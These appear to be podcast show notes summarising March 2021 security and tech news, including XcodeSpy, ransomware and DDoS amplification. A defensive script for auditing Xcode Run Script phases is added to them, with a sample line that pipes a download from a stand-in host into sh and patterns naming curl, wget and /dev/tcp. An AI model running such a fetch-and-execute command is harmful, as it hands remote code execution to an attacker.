
Tech Talk Show Notes

March 27, 2021

Intel hires Justin Long to mock Macs in a throwback to 2000s “I’m a Mac” ads

Chipmaker Intel has produced a series of ads mocking Apple’s M1 Macs, and it brought on actor Justin Long—famous for his role in Apple’s 2000s “I’m a Mac” ads opposite comedian John Hodgman—to satirize Apple’s own ad campaign.

In five video ads labeled “Justin Gets Real” that have been published to Intel’s YouTube channel, Long begins by saying, “Hello, I’m a… Justin, just a real person doing a real comparison between Mac and PC,” referencing the “Hello, I’m a Mac” and “I’m a PC” start to Apple’s numerous ads.

Long briefly examines a Windows laptop with an Intel processor, then an Apple Silicon-equipped Mac. Eventually, he comes to conclusions about how the Macs are too limited compared to what the Intel PCs can do.

It’s no coincidence that the two Macs that are compared unfavorably in the ads are Apple’s M1-based MacBook Pro and MacBook Air computers. Intel has been beleaguered of late, with both Apple’s M1 and AMD’s Ryzen processors consistently beating Intel in performance. The ads appear intended to point to other, mostly non-performance-related reasons why Intel-based laptops might provide a better experience than Apple’s recent M1 Macs.


~4,300 publicly reachable servers are posing a new DDoS hazard to the Internet

Criminals are upping the potency of distributed denial-of-service attacks with a technique that abuses a widely used Internet protocol to drastically increase the amount of junk traffic directed at targeted servers.

DDoSes are attacks that flood a website or server with more data than it can handle. The result is a denial of service to people trying to connect to the service. As DDoS-mitigation services develop protections that allow targets to withstand ever-larger torrents of traffic, the criminals respond with new ways to make the most of their limited bandwidth.

In so-called amplification attacks, DDoSers send requests of relatively small data sizes to certain types of intermediary servers. The intermediaries then send the target responses that are tens, hundreds, or thousands of times bigger. The redirection works because the requests are spoofed: they replace the IP address of the attacker with the address of the server being targeted, so the intermediaries send their responses to the target.


Ransom Payments Have Nearly Tripled

Ransomware gangs aimed to bilk business victims of even more money in 2020, causing the average ransom paid by companies to jump 171% to more than $312,000.

A new report from Palo Alto Networks, which uses data from ransomware investigations, data-leak sites, and the Dark Web, found 337 victims in 56 industries, with manufacturing, healthcare, and construction companies suffering 39% of ransomware attacks in 2020. In addition, ransom demands skyrocketed during the year, doubling both the highest ransom demand, to $30 million, and the highest-known paid ransom, to $10 million. The average victim paid more than $312,000, almost a third of the average demand.

The ransoms will likely continue to rise this year because the ransomware groups are innovating to stay ahead of defenders, says Jen Miller-Osborn, deputy director of threat intelligence at Palo Alto Networks’ Unit 42 threat research group.


Attackers are trying awfully hard to backdoor iOS developers’ Macs

Researchers said they’ve found a trojanized code library in the wild that attempts to install advanced surveillance malware on the Macs of iOS software developers.

It came in the form of a malicious project the attacker wrote for Xcode, a developer tool that Apple makes freely available to developers writing apps for iOS or another Apple OS.

The project was a copy of TabBarInteraction, a legitimate open-source project that makes it easier for developers to animate iOS tab bars based on user interaction. An Xcode project is a repository for all the files, resources, and information needed to build an app.

Alongside the legitimate code was an obfuscated script, known as a “Run Script.” The script, which got executed whenever the developer’s build was launched, contacted an attacker-controlled server to download and install a custom version of EggShell, an open-source back door that spies on users through their mic, camera, and keyboard.

Researchers with SentinelOne, the security firm that discovered the trojanized project, have named it XcodeSpy. They say they’ve uncovered two variants of the customized EggShell dropped by the malicious project. Both were uploaded to VirusTotal using the web interface from Japan, the first one on August 5 and the second one on October 13.
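
Because a Run Script executes on every build, it is worth reviewing before building any third-party Xcode project. The following is an added example, not code from SentinelOne or from the original notes: it reads the Run Script phases (PBXShellScriptBuildPhase objects) out of a project.pbxproj file and flags ones that fetch or decode content. The sample fragment is constructed, and the function name and heuristic patterns are assumptions to tune for your own projects.

```python
import re

# Constructed sample: fragment of a project.pbxproj with two Run Script phases.
SAMPLE_PBXPROJ = r'''
/* Begin PBXShellScriptBuildPhase section */
    A1000001 /* Lint */ = {
        isa = PBXShellScriptBuildPhase;
        name = Lint;
        shellPath = /bin/sh;
        shellScript = "if which swiftlint >/dev/null; then\n  swiftlint\nfi\n";
    };
    A1000002 /* ShellScript */ = {
        isa = PBXShellScriptBuildPhase;
        shellPath = /bin/sh;
        shellScript = "curl -s https://example.invalid/setup | sh\n";
    };
/* End PBXShellScriptBuildPhase section */
'''

# Assumed heuristics: behaviour a build step rarely needs.
SUSPICIOUS = {
    "network fetch": re.compile(r"\b(curl|wget)\b|/dev/tcp/"),
    "pipe to interpreter": re.compile(r"\|\s*(sh|bash|zsh|python3?|perl|osascript)\b"),
    "decode or eval": re.compile(r"\beval\b|base64\s+(-d|-D|--decode)|\bxxd\s+-r"),
}

# One object per Run Script phase: id, comment name, then the body up to "};".
PHASE = re.compile(
    r"(\w+) /\* ([^\n]*?) \*/ = \{\s*isa = PBXShellScriptBuildPhase;(.*?)\n\s*\};",
    re.S)
# The script is a quoted string with backslash escapes.
SCRIPT = re.compile(r'shellScript = "((?:[^"\\]|\\.)*)";')

def audit_run_scripts(pbxproj_text):
    """Return (object id, phase name, reasons) for each flagged Run Script."""
    findings = []
    for obj_id, name, body in PHASE.findall(pbxproj_text):
        m = SCRIPT.search(body)
        if not m:
            continue
        script = m.group(1).replace("\\n", "\n").replace('\\"', '"')
        reasons = [label for label, rx in SUSPICIOUS.items() if rx.search(script)]
        if reasons:
            findings.append((obj_id, name, reasons))
    return findings

if __name__ == "__main__":
    for obj_id, name, reasons in audit_run_scripts(SAMPLE_PBXPROJ):
        print(f"{obj_id} ({name}): {', '.join(reasons)}")
```

A script that is obfuscated in ways these patterns miss will not be flagged, so treat a clean result as a prompt to read the listed phases, not as a verdict.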


What CISOs Can Learn From Big Breaches: Focus on the Root Causes

There have been dozens of mega-breaches in the past decade and over 9,000 reported breaches. Unsurprisingly, many breaches are unreported, as shown by credential dumps available on the Dark Web of which a breached organization may be completely unaware. What’s going wrong? Why haven’t we been able to stop these breaches? 

In past years, we’ve seen a plethora of security compliance standards rise — PCI, ISO 2700x, NIST 800-53, HIPAA, and others — which require hundreds of checkboxes to be addressed. However, most breached organizations have been compliant at the time the breach occurred. While compliance brings many advantages for helping organizations get more secure, it isn’t sufficient to prevent most breaches.

The primary reason these incidents take place so often is that, as an industry, we haven’t been focusing on the root causes of breaches. 


FBI: Business Email Compromise Cost $1.8B in 2020

The FBI’s Internet Crime Complaint Center (IC3) reports the American public submitted 791,790 complaints in 2020, marking a 69% increase from 2019. Total losses from cybercrime exceeded $4.1 billion.

Business email compromise (BEC) scams were the most expensive, with 19,369 complaints and adjusted losses of approximately $1.8 billion. Phishing scams were also rampant, with 241,342 complaints – a big jump from 114,702 in 2019 – and adjusted losses of more than $54 million. Ransomware complaints continued to increase, with 2,474 incidents reported last year. 

Officials report BEC scams have evolved since 2013 when these attacks typically spoofed email accounts of chief executive officers or chief financial officers and requested wire payments. The scams have since evolved to compromise personal emails and vendor emails. In 2020, the IC3 saw more BEC complaints detail identity theft and funds being converted into cryptocurrency. 


One company wants to sell the feds location data from every car on Earth

There is a strange sort of symmetry in the world of personal data this week: one new report has identified a company that wants to sell the US government granular car location data from basically every vehicle in the world, while a group of privacy advocates is suing another company for providing customer data to the feds.

A surveillance contractor called Ulysses can “remotely geolocate vehicles in nearly every country except for North Korea and Cuba on a near real-time basis,” Vice Motherboard reports.

Ulysses obtains vehicle telematics data from embedded sensors and communications sensors that can transmit information such as seatbelt status, engine temperature, and current vehicle location back to automakers or other parties.

“Among the thousands of other data points, vehicle location data is transmitted on a constant and near real-time basis while the vehicle is operating,” the company wrote in a sales pitch document obtained by Vice. As roughly 100 million new cars are manufactured worldwide each year that are “increasingly connected to the manufacturer, other vehicles, infrastructure, and their owners, it becomes apparent that telematics will revolutionize intelligence,” the document adds. 


Tech Vendors’ Lack of Security Transparency Worries Firms

An increasing number of companies have identified security assurance as a major consideration in their decisions to purchase hardware, software, and services — yet many vendors fall short, according to a report published this week by the Ponemon Institute.

Nearly two-thirds (64%) of those polled in the survey consider it very important for their technology providers to be transparent about vulnerabilities, security updates, and ways to patch security issues. But most vendors fail to offer that transparency, according to 47% of those respondents who said they’re not satisfied with the security information provided by vendors. Nearly three-quarters of those surveyed are more likely to purchase technologies and services from companies that prioritize the finding and patching of vulnerabilities and the communications of those security issues, the Intel-sponsored report states.

The survey seems to indicate companies are worried not only about their own security but that of their suppliers as well, says Larry Ponemon, chairman and founder of the Ponemon Institute.